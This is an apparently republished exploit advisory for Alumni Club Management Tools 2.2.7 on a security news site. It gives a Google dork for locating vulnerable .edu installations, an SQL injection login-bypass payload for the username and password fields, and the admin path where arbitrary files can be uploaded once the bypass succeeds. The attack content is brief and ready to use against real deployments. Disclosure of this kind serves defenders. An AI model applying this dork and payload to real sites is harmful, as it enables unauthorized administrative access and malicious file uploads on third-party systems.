Exploit/Advisories no image

Published on July 3rd, 2023 📆 | 2180 Views ⚑

8

Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec


iSpeech

====================================================================================================================================
| # Title : Alumni Club Management Tools v 2.2.7 Unrestricted File Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |
| # Vendor : http://alumnimagnet.com |
| # Dork : intext:Powered by AlumniMagnet site:edu inurl:/images.html?view_album= site:edu |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] suffers from remote sql injection as well From within the control panel, malicious files can be uploaded .

[+] Use Payload : user : 'or''='@gmail.com pass : 'or''=' to login .





[+] Go to https://127.0.0.1/edu/admin_files.html?sub_op=upload_files

[+] find your files https://127.0.0.1/edu/admin_files.html

====Greetings to :=========================================================================================================================
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
===========================================================================================================================================

Source link

Tagged with:



8 Responses to Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec